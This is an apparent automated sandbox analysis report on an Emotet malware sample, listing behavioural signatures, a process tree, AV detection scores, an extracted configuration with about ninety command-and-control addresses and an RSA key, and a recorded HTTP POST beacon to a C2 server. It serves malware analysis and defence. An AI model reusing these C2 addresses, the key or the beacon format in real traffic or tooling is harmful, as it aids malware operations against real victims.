Loading ...

Play interactive tourEdit tour

Analysis Report QgWIrI5nvn

Overview

General Information

Sample Name:QgWIrI5nvn (renamed file extension from none to exe)
Analysis ID:317585
MD5:a527ec7a52e66e6850943b4fa64fa2c3
SHA1:e5fc894131067826297d26b8bdad4aa9895992b1
SHA256:34f1bf9de98302a9b8b0f8fbd53feec40037696e86b76ae3c019b76e2bdb74de

Most interesting Screenshot:

Detection

Emotet
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • QgWIrI5nvn.exe (PID: 4624 cmdline: 'C:\Users\user\Desktop\QgWIrI5nvn.exe' MD5: A527EC7A52E66E6850943B4FA64FA2C3)
    • calc.exe (PID: 6040 cmdline: C:\Windows\SysWOW64\udhisapi\calc.exe MD5: A527EC7A52E66E6850943B4FA64FA2C3)
  • svchost.exe (PID: 4012 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1384 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4372 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 800 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6156 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6252 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6292 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6332 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 3228 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 4416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6424 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["47.36.140.164:80", "169.50.76.149:8080", "162.241.140.129:8080", "104.131.123.136:443", "95.213.236.64:8080", "130.0.132.242:80", "123.176.25.234:80", "46.105.131.79:8080", "157.245.99.39:8080", "79.98.24.39:8080", "49.50.209.131:80", "72.143.73.234:443", "50.91.114.38:80", "89.216.122.92:80", "5.39.91.110:7080", "121.124.124.40:7080", "71.72.196.159:80", "5.196.74.210:8080", "139.162.108.71:8080", "61.19.246.238:443", "91.211.88.52:7080", "120.150.60.189:80", "137.59.187.107:8080", "139.59.60.244:8080", "124.41.215.226:80", "194.187.133.160:443", "50.35.17.13:80", "75.139.38.211:80", "96.249.236.156:443", "78.188.106.53:443", "62.75.141.82:80", "190.108.228.27:443", "218.147.193.146:80", "94.23.237.171:443", "139.162.60.124:8080", "96.245.227.43:80", "174.106.122.139:80", "113.61.66.94:80", "93.147.212.206:80", "203.153.216.189:7080", "104.131.11.150:443", "94.200.114.161:80", "87.106.136.232:8080", "69.206.132.149:80", "172.91.208.86:80", "110.145.77.103:80", "188.219.31.12:80", "71.15.245.148:8080", "121.7.31.214:80", "97.82.79.83:80", "42.200.107.142:80", "185.94.252.104:443", "168.235.67.138:7080", "91.146.156.228:80", "24.137.76.62:80", "87.106.139.101:8080", "5.196.108.189:8080", "194.4.58.192:7080", "110.142.236.207:80", "24.179.13.119:80", "75.143.247.51:80", "172.104.97.173:8080", "216.139.123.119:80", "118.83.154.64:443", "109.74.5.95:8080", "104.131.44.150:8080", "37.139.21.175:8080", "139.99.158.11:443", "220.245.198.194:80", "140.186.212.146:80", "78.24.219.147:8080", "176.111.60.55:8080", "37.187.72.193:8080", "162.241.242.173:8080", "209.141.54.221:8080", "108.46.29.236:80", "103.86.49.11:8080", "174.45.13.118:80", "68.252.26.78:80", "62.30.7.67:443", "134.209.36.254:8080", "120.150.218.241:443", "79.137.83.50:443", "85.25.106.204:8080", "186.74.215.34:80", "80.241.255.202:8080", "24.43.32.186:80", "76.175.162.101:80", "190.240.194.77:443", "47.144.21.12:443", "47.36.140.164:80", "169.50.76.149:8080", "162.241.140.129:8080", "104.131.123.136:443", "95.213.236.64:8080", "130.0.132.242:80", "123.176.25.234:80", "46.105.131.79:8080", "157.245.99.39:8080", "79.98.24.39:8080", "49.50.209.131:80", "72.143.73.234:443", "50.91.114.38:80", "89.216.122.92:80", "5.39.91.110:7080", "121.124.124.40:7080", "71.72.196.159:80", "5.196.74.210:8080", "139.162.108.71:8080", "61.19.246.238:443", "91.211.88.52:7080", "120.150.60.189:80", "137.59.187.107:8080", "139.59.60.244:8080", "124.41.215.226:80", "194.187.133.160:443", "50.35.17.13:80", "75.139.38.211:80", "96.249.236.156:443", "78.188.106.53:443", "62.75.141.82:80", "190.108.228.27:443", "218.147.193.146:80", "94.23.237.171:443", "139.162.60.124:8080", "96.245.227.43:80", "174.106.122.139:80", "113.61.66.94:80", "93.147.212.206:80", "203.153.216.189:7080", "104.131.11.150:443", "94.200.114.161:80", "87.106.136.232:8080", "69.206.132.149:80", "172.91.208.86:80", "110.145.77.103:80", "188.219.31.12:80", "71.15.245.148:8080", "121.7.31.214:80", "97.82.79.83:80", "42.200.107.142:80", "185.94.252.104:443", "168.235.67.138:7080", "91.146.156.228:80", "24.137.76.62:80", "87.106.139.101:8080", "5.196.108.189:8080", "194.4.58.192:7080", "110.142.236.207:80", "24.179.13.119:80", "75.143.247.51:80", "172.104.97.173:8080", "216.139.123.119:80", "118.83.154.64:443", "109.74.5.95:8080", "104.131.44.150:8080", "37.139.21.175:8080", "139.99.158.11:443", "220.245.198.194:80", "140.186.212.146:80", "78.24.219.147:8080", "176.111.60.55:8080", "37.187.72.193:8080", "162.241.242.173:8080", "209.141.54.221:8080", "108.46.29.236:80", "103.86.49.11:8080", "174.45.13.118:80", "68.252.26.78:80", "62.30.7.67:443", "134.209.36.254:8080", "120.150.218.241:443", "79.137.83.50:443", "85.25.106.204:8080", "186.74.215.34:80", "80.241.255.202:8080", "24.43.32.186:80", "76.175.162.101:80", "190.240.194.77:443", "47.144.21.12:443"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.239888094.00000000007D0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000001.00000002.506147931.0000000000611000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000001.00000002.506045325.00000000005F4000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000000.00000002.239926495.0000000000831000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000001.00000002.505938111.00000000005C0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.QgWIrI5nvn.exe.830000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              1.2.calc.exe.610000.2.unpackJoeSecurity_EmotetYara detected EmotetJoe Security

                Sigma Overview

                No Sigma rule has matched

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 00000000.00000002.239888094.00000000007D0000.00000040.00000001.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["47.36.140.164:80", "169.50.76.149:8080", "162.241.140.129:8080", "104.131.123.136:443", "95.213.236.64:8080", "130.0.132.242:80", "123.176.25.234:80", "46.105.131.79:8080", "157.245.99.39:8080", "79.98.24.39:8080", "49.50.209.131:80", "72.143.73.234:443", "50.91.114.38:80", "89.216.122.92:80", "5.39.91.110:7080", "121.124.124.40:7080", "71.72.196.159:80", "5.196.74.210:8080", "139.162.108.71:8080", "61.19.246.238:443", "91.211.88.52:7080", "120.150.60.189:80", "137.59.187.107:8080", "139.59.60.244:8080", "124.41.215.226:80", "194.187.133.160:443", "50.35.17.13:80", "75.139.38.211:80", "96.249.236.156:443", "78.188.106.53:443", "62.75.141.82:80", "190.108.228.27:443", "218.147.193.146:80", "94.23.237.171:443", "139.162.60.124:8080", "96.245.227.43:80", "174.106.122.139:80", "113.61.66.94:80", "93.147.212.206:80", "203.153.216.189:7080", "104.131.11.150:443", "94.200.114.161:80", "87.106.136.232:8080", "69.206.132.149:80", "172.91.208.86:80", "110.145.77.103:80", "188.219.31.12:80", "71.15.245.148:8080", "121.7.31.214:80", "97.82.79.83:80", "42.200.107.142:80", "185.94.252.104:443", "168.235.67.138:7080", "91.146.156.228:80", "24.137.76.62:80", "87.106.139.101:8080", "5.196.108.189:8080", "194.4.58.192:7080", "110.142.236.207:80", "24.179.13.119:80", "75.143.247.51:80", "172.104.97.173:8080", "216.139.123.119:80", "118.83.154.64:443", "109.74.5.95:8080", "104.131.44.150:8080", "37.139.21.175:8080", "139.99.158.11:443", "220.245.198.194:80", "140.186.212.146:80", "78.24.219.147:8080", "176.111.60.55:8080", "37.187.72.193:8080", "162.241.242.173:8080", "209.141.54.221:8080", "108.46.29.236:80", "103.86.49.11:8080", "174.45.13.118:80", "68.252.26.78:80", "62.30.7.67:443", "134.209.36.254:8080", "120.150.218.241:443", "79.137.83.50:443", "85.25.106.204:8080", "186.74.215.34:80", "80.241.255.202:8080", "24.43.32.186:80", "76.175.162.101:80", "190.240.194.77:443", "47.144.21.12:443", "47.36.140.164:80", "169.50.76.149:8080", "162.241.140.129:8080", "104.131.123.136:443", "95.213.236.64:8080", "130.0.132.242:80", "123.176.25.234:80", "46.105.131.79:8080", "157.245.99.39:8080", "79.98.24.39:8080", "49.50.209.131:80", "72.143.73.234:443", "50.91.114.38:80", "89.216.122.92:80", "5.39.91.110:7080", "121.124.124.40:7080", "71.72.196.159:80", "5.196.74.210:8080", "139.162.108.71:8080", "61.19.246.238:443", "91.211.88.52:7080", "120.150.60.189:80", "137.59.187.107:8080", "139.59.60.244:8080", "124.41.215.226:80", "194.187.133.160:443", "50.35.17.13:80", "75.139.38.211:80", "96.249.236.156:443", "78.188.106.53:443", "62.75.141.82:80", "190.108.228.27:443", "218.147.193.146:80", "94.23.237.171:443", "139.162.60.124:8080", "96.245.227.43:80", "174.106.122.139:80", "113.61.66.94:80", "93.147.212.206:80", "203.153.216.189:7080", "104.131.11.150:443", "94.200.114.161:80", "87.106.136.232:8080", "69.206.132.149:80", "172.91.208.86:80", "110.145.77.103:80", "188.219.31.12:80", "71.15.245.148:8080", "121.7.31.214:80", "97.82.79.83:80", "42.200.107.14
                Source: 00000000.00000002.239888094.00000000007D0000.00000040.00000001.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["47.36.140.164:80", "169.50.76.149:8080", "162.241.140.129:8080", "104.131.123.136:443", "95.213.236.64:8080", "130.0.132.242:80", "123.176.25.234:80", "46.105.131.79:8080", "157.245.99.39:8080", "79.98.24.39:8080", "49.50.209.131:80", "72.143.73.234:443", "50.91.114.38:80", "89.216.122.92:80", "5.39.91.110:7080", "121.124.124.40:7080", "71.72.196.159:80", "5.196.74.210:8080", "139.162.108.71:8080", "61.19.246.238:443", "91.211.88.52:7080", "120.150.60.189:80", "137.59.187.107:8080", "139.59.60.244:8080", "124.41.215.226:80", "194.187.133.160:443", "50.35.17.13:80", "75.139.38.211:80", "96.249.236.156:443", "78.188.106.53:443", "62.75.141.82:80", "190.108.228.27:443", "218.147.193.146:80", "94.23.237.171:443", "139.162.60.124:8080", "96.245.227.43:80", "174.106.122.139:80", "113.61.66.94:80", "93.147.212.206:80", "203.153.216.189:7080", "104.131.11.150:443", "94.200.114.161:80", "87.106.136.232:8080", "69.206.132.149:80", "172.91.208.86:80", "110.145.77.103:80", "188.219.31.12:80", "71.15.245.148:8080", "121.7.31.214:80", "97.82.79.83:80", "42.200.107.142:80", "185.94.252.104:443", "168.235.67.138:7080", "91.146.156.228:80", "24.137.76.62:80", "87.106.139.101:8080", "5.196.108.189:8080", "194.4.58.192:7080", "110.142.236.207:80", "24.179.13.119:80", "75.143.247.51:80", "172.104.97.173:8080", "216.139.123.119:80", "118.83.154.64:443", "109.74.5.95:8080", "104.131.44.150:8080", "37.139.21.175:8080", "139.99.158.11:443", "220.245.198.194:80", "140.186.212.146:80", "78.24.219.147:8080", "176.111.60.55:8080", "37.187.72.193:8080", "162.241.242.173:8080", "209.141.54.221:8080", "108.46.29.236:80", "103.86.49.11:8080", "174.45.13.118:80", "68.252.26.78:80", "62.30.7.67:443", "134.209.36.254:8080", "120.150.218.241:443", "79.137.83.50:443", "85.25.106.204:8080", "186.74.215.34:80", "80.241.255.202:8080", "24.43.32.186:80", "76.175.162.101:80", "190.240.194.77:443", "47.144.21.12:443", "47.36.140.164:80", "169.50.76.149:8080", "162.241.140.129:8080", "104.131.123.136:443", "95.213.236.64:8080", "130.0.132.242:80", "123.176.25.234:80", "46.105.131.79:8080", "157.245.99.39:8080", "79.98.24.39:8080", "49.50.209.131:80", "72.143.73.234:443", "50.91.114.38:80", "89.216.122.92:80", "5.39.91.110:7080", "121.124.124.40:7080", "71.72.196.159:80", "5.196.74.210:8080", "139.162.108.71:8080", "61.19.246.238:443", "91.211.88.52:7080", "120.150.60.189:80", "137.59.187.107:8080", "139.59.60.244:8080", "124.41.215.226:80", "194.187.133.160:443", "50.35.17.13:80", "75.139.38.211:80", "96.249.236.156:443", "78.188.106.53:443", "62.75.141.82:80", "190.108.228.27:443", "218.147.193.146:80", "94.23.237.171:443", "139.162.60.124:8080", "96.245.227.43:80", "174.106.122.139:80", "113.61.66.94:80", "93.147.212.206:80", "203.153.216.189:7080", "104.131.11.150:443", "94.200.114.161:80", "87.106.136.232:8080", "69.206.132.149:80", "172.91.208.86:80", "110.145.77.103:80", "188.219.31.12:80", "71.15.245.148:8080", "121.7.31.214:80", "97.82.79.83:80", "42.200.107.14
                Multi AV Scanner detection for submitted fileShow sources
                Source: QgWIrI5nvn.exeVirustotal: Detection: 52%Perma Link
                Source: QgWIrI5nvn.exeMetadefender: Detection: 43%Perma Link
                Source: QgWIrI5nvn.exeReversingLabs: Detection: 62%
                Source: QgWIrI5nvn.exeVirustotal: Detection: 52%Perma Link
                Source: QgWIrI5nvn.exeMetadefender: Detection: 43%Perma Link
                Source: QgWIrI5nvn.exeReversingLabs: Detection: 62%
                Source: 0.2.QgWIrI5nvn.exe.830000.1.unpackAvira: Label: TR/Dropper.Gen
                Source: 1.2.calc.exe.610000.2.unpackAvira: Label: TR/Dropper.Gen
                Source: 0.2.QgWIrI5nvn.exe.830000.1.unpackAvira: Label: TR/Dropper.Gen
                Source: 1.2.calc.exe.610000.2.unpackAvira: Label: TR/Dropper.Gen
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00439132 lstrlenA,FindFirstFileA,FindClose,0_2_00439132
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00437C5A __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,0_2_00437C5A
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_008337E0 FindFirstFileW,GetProcessHeap,GetProcessHeap,FindNextFileW,FindClose,0_2_008337E0
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00439132 lstrlenA,FindFirstFileA,FindClose,0_2_00439132
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00437C5A __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,0_2_00437C5A
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_008337E0 FindFirstFileW,GetProcessHeap,GetProcessHeap,FindNextFileW,FindClose,0_2_008337E0
                Source: C:\Windows\SysWOW64\udhisapi\calc.exeCode function: 1_2_00439132 lstrlenA,FindFirstFileA,FindClose,1_2_00439132
                Source: C:\Windows\SysWOW64\udhisapi\calc.exeCode function: 1_2_00437C5A __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,1_2_00437C5A

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.5:49720 -> 47.36.140.164:80
                Source: TrafficSnort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.5:49720 -> 47.36.140.164:80
                Source: Joe Sandbox ViewIP Address: 47.36.140.164 47.36.140.164
                Source: Joe Sandbox ViewIP Address: 47.36.140.164 47.36.140.164
                Source: Joe Sandbox ViewIP Address: 47.36.140.164 47.36.140.164
                Source: Joe Sandbox ViewIP Address: 47.36.140.164 47.36.140.164
                Source: Joe Sandbox ViewASN Name: CHARTER-20115US CHARTER-20115US
                Source: Joe Sandbox ViewASN Name: CHARTER-20115US CHARTER-20115US
                Source: global trafficHTTP traffic detected: POST /BiRnSEbQidy6zY/IHZNRG0LdgOvnHD7h1/LPv7QD8SWPFeI9n/VlM63SymTHHvqch/HEdP9rq3H7Lb/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 47.36.140.164/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=------------------PdiMWQ75Db7NqC2aIJUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 47.36.140.164Content-Length: 4580Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /BiRnSEbQidy6zY/IHZNRG0LdgOvnHD7h1/LPv7QD8SWPFeI9n/VlM63SymTHHvqch/HEdP9rq3H7Lb/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 47.36.140.164/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=------------------PdiMWQ75Db7NqC2aIJUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 47.36.140.164Content-Length: 4580Cache-Control: no-cache
                Source: unknownTCP traffic detected without corresponding DNS query: 47.36.140.164
                Source: unknownTCP traffic detected without corresponding DNS query: 47.36.140.164
                Source: unknownTCP traffic detected without corresponding DNS query: 47.36.140.164
                Source: unknownTCP traffic detected without corresponding DNS query: 47.36.140.164
                Source: unknownTCP traffic detected without corresponding DNS query: 47.36.140.164
                Source: unknownTCP traffic detected without corresponding DNS query: 47.36.140.164
                Source: unknownTCP traffic detected without corresponding DNS query: 47.36.140.164
                Source: unknownTCP traffic detected without corresponding DNS query: 47.36.140.164
                Source: unknownTCP traffic detected without corresponding DNS query: 47.36.140.164
                Source: unknownTCP traffic detected without corresponding DNS query: 47.36.140.164
                Source: unknownTCP traffic detected without corresponding DNS query: 47.36.140.164
                Source: unknownTCP traffic detected without corresponding DNS query: 47.36.140.164
                Source: unknownTCP traffic detected without corresponding DNS query: 47.36.140.164
                Source: unknownTCP traffic detected without corresponding DNS query: 47.36.140.164
                Source: unknownTCP traffic detected without corresponding DNS query: 47.36.140.164
                Source: unknownTCP traffic detected without corresponding DNS query: 47.36.140.164
                Source: unknownTCP traffic detected without corresponding DNS query: 47.36.140.164
                Source: unknownTCP traffic detected without corresponding DNS query: 47.36.140.164
                Source: unknownHTTP traffic detected: POST /BiRnSEbQidy6zY/IHZNRG0LdgOvnHD7h1/LPv7QD8SWPFeI9n/VlM63SymTHHvqch/HEdP9rq3H7Lb/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 47.36.140.164/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=------------------PdiMWQ75Db7NqC2aIJUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 47.36.140.164Content-Length: 4580Cache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /BiRnSEbQidy6zY/IHZNRG0LdgOvnHD7h1/LPv7QD8SWPFeI9n/VlM63SymTHHvqch/HEdP9rq3H7Lb/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 47.36.140.164/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=------------------PdiMWQ75Db7NqC2aIJUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 47.36.140.164Content-Length: 4580Cache-Control: no-cache
                Source: calc.exe, 00000001.00000002.507116463.0000000002573000.00000004.00000001.sdmpString found in binary or memory: http://47.36.140.164/BiRnSEbQidy6zY/IHZNRG0LdgOvnHD7h1/LPv7QD8SWPFeI9n/VlM63SymTHHvqch/HEdP9rq3H7Lb/
                Source: svchost.exe, 00000003.00000002.508684218.00000202E100F000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: svchost.exe, 00000003.00000002.508684218.00000202E100F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                Source: svchost.exe, 00000003.00000002.508684218.00000202E100F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                Source: svchost.exe, 00000003.00000002.508237407.00000202E0E50000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: svchost.exe, 00000008.00000002.304836563.000001B8A2C13000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                Source: svchost.exe, 00000006.00000002.505673263.000001D22A23E000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                Source: svchost.exe, 00000006.00000002.505673263.000001D22A23E000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                Source: svchost.exe, 00000006.00000002.505673263.000001D22A23E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                Source: svchost.exe, 00000006.00000002.505673263.000001D22A23E000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                Source: svchost.exe, 00000006.00000002.505673263.000001D22A23E000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                Source: svchost.exe, 00000008.00000003.304698673.000001B8A2C49000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                Source: svchost.exe, 00000008.00000002.304861593.000001B8A2C3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                Source: svchost.exe, 00000008.00000002.304875218.000001B8A2C52000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 00000008.00000002.304861593.000001B8A2C3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                Source: svchost.exe, 00000008.00000003.304727348.000001B8A2C41000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                Source: svchost.exe, 00000008.00000003.304727348.000001B8A2C41000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                Source: svchost.exe, 00000008.00000003.304712761.000001B8A2C40000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                Source: svchost.exe, 00000008.00000003.304698673.000001B8A2C49000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000008.00000002.304881320.000001B8A2C5C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000008.00000002.304881320.000001B8A2C5C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000008.00000002.304885191.000001B8A2C61000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                Source: svchost.exe, 00000008.00000002.304861593.000001B8A2C3D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000008.00000003.282748250.000001B8A2C31000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 00000008.00000002.304861593.000001B8A2C3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                Source: svchost.exe, 00000008.00000002.304836563.000001B8A2C13000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.304861593.000001B8A2C3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000008.00000003.304712761.000001B8A2C40000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
